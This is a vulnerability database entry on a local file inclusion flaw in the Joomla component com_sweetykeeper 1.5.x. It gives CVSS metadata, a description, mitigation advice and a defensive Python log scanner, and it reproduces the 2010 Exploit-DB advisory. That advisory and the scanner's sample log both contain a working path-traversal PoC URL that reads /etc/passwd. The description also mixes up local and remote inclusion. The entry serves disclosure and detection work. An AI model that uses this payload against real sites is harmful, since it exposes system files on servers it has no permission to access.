Vendor: com_sweetykeeper
By: AntiSecurity
CVSS: 7.5 (HIGH)
Type: Local File Inclusion
CWE: 98
Product Name: com_sweetykeeper
Affected Version From: 1.5.x
Affected Version To: 1.5.x
Patch Exists: No
Related CWE: N/A
CPE: a:joomlacorner:com_sweetykeeper
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Joomla Component Sweetykeeper Local File Inclusion Vulnerability

A local file inclusion vulnerability exists in Joomla Component Sweetykeeper version 1.5.x. An attacker can exploit it by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to include a file from a remote server that contains malicious code, resulting in malicious code execution on the vulnerable server.

Mitigation:

Ensure that user input is validated and filtered before being used in file operations. Also, ensure that the web server is configured to deny access to files outside of the web root directory.
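
An added example, not part of the original advisory or the component's own code: the input check described above, applied to web access logs to flag requests to com_sweetykeeper whose controller value is not a plain name. The allowlist pattern, the log format, the `keeper` controller name and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: legitimate controller names are plain identifiers.
SAFE_CONTROLLER = re.compile(r"[A-Za-z0-9_-]+")
# Request line inside a common/combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def controller_is_safe(value):
    """Allowlist check: rejects path separators, dots, NUL bytes and empty values."""
    return SAFE_CONTROLLER.fullmatch(value) is not None


def suspicious_requests(log_lines, component="com_sweetykeeper"):
    """Return (line_number, decoded_controller) for requests to the component
    whose controller parameter fails the allowlist."""
    hits = []
    for lineno, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        # parse_qs percent-decodes once, so %00 becomes a literal NUL byte.
        query = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
        if component not in query.get("option", []):
            continue
        for value in query.get("controller", []):
            if not controller_is_safe(value):
                hits.append((lineno, value))
    return hits


# Constructed sample log (documentation IP range); line 2 carries the
# request shape shown in the advisory's PoC.
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Apr/2010:10:00:01 +0700] "GET /index.php?option=com_sweetykeeper&controller=keeper HTTP/1.1" 200 5120',
    '192.0.2.44 - - [12/Apr/2010:10:00:07 +0700] "GET /index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1873',
    '192.0.2.10 - - [12/Apr/2010:10:00:09 +0700] "GET /index.php?option=com_content&view=article&id=3 HTTP/1.1" 200 8040',
]

if __name__ == "__main__":
    for lineno, value in suspicious_requests(SAMPLE_LOG):
        print(f"line {lineno}: rejected controller value {value!r}")
```

The same `controller_is_safe` test is the kind of check to apply server-side before a request value is used to build a file path.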

Exploit-DB raw data:

==================================================================================================================


  [o] Joomla Component Sweetykeeper Local File Inclusion Vulnerability
 
       Software : com_sweetykeeper version 1.5.x
       Vendor   : http://www.joomlacorner.com/
       Download : http://joomlacode.org/gf/project/thai/frs/?action=FrsReleaseView&release_id=9191
       Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
       Contact  : public[at]antisecurity[dot]org
       Home     : http://antisecurity.org/


==================================================================================================================


  [o] Exploit

       http://localhost/[path]/index.php?option=com_sweetykeeper&controller=[LFI]


  [o] PoC

       http://localhost/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00


==================================================================================================================


  [o] Greetz

       Angela Zhang stardustmemory aJe martfella pizzyroot Genex
       H312Y yooogy mousekill }^-^{ noname matthews s4va wishnusakti
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke kaka11


==================================================================================================================


  [o] April 12 2010 - GMT +07:00 Jakarta, Indonesia